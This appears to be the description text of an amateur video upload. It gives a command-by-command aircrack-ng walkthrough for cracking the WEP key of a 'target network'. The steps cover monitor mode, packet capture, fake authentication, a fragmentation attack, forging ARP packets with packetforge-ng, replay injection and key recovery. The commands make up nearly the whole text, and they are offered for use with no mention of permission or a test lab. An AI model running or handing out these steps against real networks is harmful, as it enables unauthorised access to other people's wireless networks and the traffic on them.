Wep crack using packetforge in BACKTRACK HD
IN STEP 5, USE THIS PACKET IS........ (y) WITHOUT ( ) FAST way to crack WEP with backtrack using packetforge! PLEASE rate/comment as this is 1st upload ever :) You can also do this without the clients mac address and it is just as effective!!!! Commands below after # signs!!! CHECKING NETWORK ADAPTERS INTERFACE #airmon-ng ENABLING MONITOR MODE #airmon-ng start wlan0 (where wlan0 is your network cards interface) STARTING DUMP OF NETWORKS-SCANNING NETWORKS #airodump-ng mon0 (where mon0 is wlan0 when place into monitor mode) STARTING DUMP OF SPECIFIED NETWORK AND MAKING A CAPTURE FILE #airodump-ng --bssid 00:00:00:00:00:00 --channel 1 -w target mon0 (where 00:00:00:00:00:00 is the bssid of target network, where 1 is target networks channel, where -w means write, where target is the name of the capture file you are writing) Authentication request #aireplay-ng -1 0 -a (BSSID) mon0 (DELETE quotes and enter targets bssid) Produces fragment file #aireplay-ng -5 -b (BSSID) mon0 (DELETE quotes and enter targets bssid) Creates packetforge for aireplay #packetforge-ng -0 -a (BSSID) -h 00:11:22:33:44:55 -l 255.255.255.255 -k 255.255.255.255 -y (fragment file from command above) -w arpy (DELETE quotes and enter targets bssid, as with the quotes and insert the fragment file) #aireplay-ng -3 -r arpy -b (BSSID) mon0 (DELETE quotes and enter targets bssid) #aircrack-ng target-01.cap (where target is the name of capture file)
Похожие видео
Показать еще